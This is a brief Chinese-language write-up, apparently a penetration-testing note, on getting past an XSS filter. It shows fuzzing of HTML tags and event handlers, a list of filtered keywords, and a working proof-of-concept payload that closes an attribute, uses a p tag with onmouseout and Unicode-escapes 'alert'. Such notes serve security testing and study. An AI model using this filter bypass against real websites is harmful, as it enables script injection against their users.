经测试双写，大小写，url编码，超长字符串等都无法绕过

fuzz html tag

大部分标签都可用，就选p标签吧

系统过滤了一些on事件，再fuzz html onevent

还是有大部分可用

尝试<p%20onmouseout=alert`x`>xss</p>

经测试，系统过滤了一些关键字如下

href

src

alert

confirm

prompt

javascript

script

直接unicode编码alert

构造poc

“><p onmouseout=\u0061\u006c\u0065\u0072\u0074`x`>xss</p>

成功弹窗